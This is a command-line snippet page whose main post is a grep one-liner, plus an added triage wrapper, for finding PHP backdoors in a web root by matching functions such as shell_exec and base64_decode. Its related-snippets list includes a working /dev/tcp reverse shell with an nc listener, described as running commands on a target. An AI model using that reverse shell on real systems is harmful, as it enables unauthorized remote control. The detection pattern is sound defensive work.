grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readf?ile) *\(" /var/www/

find php command backdoor


0
By: siamware
2013-08-23 09:17:28
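
A triage wrapper around the one-liner above, as an added example that is not part of the original post: it uses grep -E instead of -P, spells out the --include globs so it does not depend on brace expansion, and lists which functions matched in each file. The function names and the sample web root are constructed for illustration.

```shell
# Added example; function names and sample files are constructed, not from the post.
PATTERN='(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readf?ile) *\('

# Candidate files under a web root (same extensions as the one-liner), sorted.
scan_webroot() {
    grep -REl --include='*.php' --include='*.txt' --include='*.asp' "$PATTERN" "$1" | sort
}

# Distinct matched function names in one file, comma-separated, for triage.
matched_functions() {
    grep -Eo "$PATTERN" "$1" | sed 's/ *($//' | sort -u | paste -sd, -
}

# One "relative/path: functions" line per candidate file.
triage_report() {
    scan_webroot "$1" | while IFS= read -r f; do
        printf '%s: %s\n' "${f#"$1"/}" "$(matched_functions "$f")"
    done
}

# Constructed sample web root: one clean page, one ordinary upload handler,
# one file mixing decoding with command execution, one file with an
# extension the scan does not cover.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/inc"
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/index.php"
    printf '%s\n' '<?php mkdir($dir); $h = fopen($path, "w"); fclose($h); ?>' > "$d/upload.php"
    printf '%s\n' '<?php $p = base64_decode($blob); echo shell_exec ("uptime"); ?>' > "$d/inc/cache.php"
    printf '%s\n' 'call system() carefully' > "$d/notes.md"
    echo "$d"
}
```

In the sample, upload.php is flagged for ordinary file handling and notes.md is skipped because of its extension, so hits are leads for manual review and a clean result does not cover other file types.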

These Might Interest You

  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.


    8
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 0
  • Similar to entering a command, but will not erase the command from the command line. Basically a shortcut from entering command, then pushing the up arrow key.


    8
    <ctrl>+o
    snipertyler · 2014-12-28 22:00:15 2
  • !<command> will expand to the last time you ran <command>, options and all. It's a nicer alternative to ^R for simple cases, and it's quite helpful for those long commands you run every now and then and haven't made aliases or functions for. It's similar to command 3966, in some sense.


    1
    !<command>
    kaedenn · 2011-08-16 18:37:18 2
  • When writing on the command line of zsh, by pressing Alt+q the command will be cleaned, and you can insert another one. The command you were writing will be recorded, and pasted on the prompt immediately after the "interrupting" command is inserted.


    5
    <alt+q>
    luther · 2009-10-29 14:55:12 1
  • Slightly simpler version of previous sed command that does the same thing. In this case, the output will stop at the command, and the entire command will be terminated as well, instead of proceeding through the whole file.


    1
    command | sed '/regex/q'
    taliver · 2009-12-29 14:52:41 0
  • 5 helpful aliases for using the which utility, specifically for the GNU which (2.16 tested) that is included in coreutils.
    Which is run first for a command. Same as type builtin minus verbosity
    alias which='{ command alias; command declare -f; } | command which --read-functions --read-alias'
    Which (a)lias
    alias whicha='command alias | command which --read-alias'
    Which (f)unction
    alias whichf='command declare -f | command which --read-functions'
    Which e(x)ecutable file in PATH
    alias whichx='command which'
    Which (all) alias, function, builtin, and files in PATH
    alias whichall='{ command alias; command declare -f; } | command which --read-functions --read-alias -a'
    # From my .bash_profile http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html


    2
    alias whichall='{ command alias; command declare -f; } | command which --read-functions --read-alias -a'
    AskApache · 2010-11-18 03:32:04 5
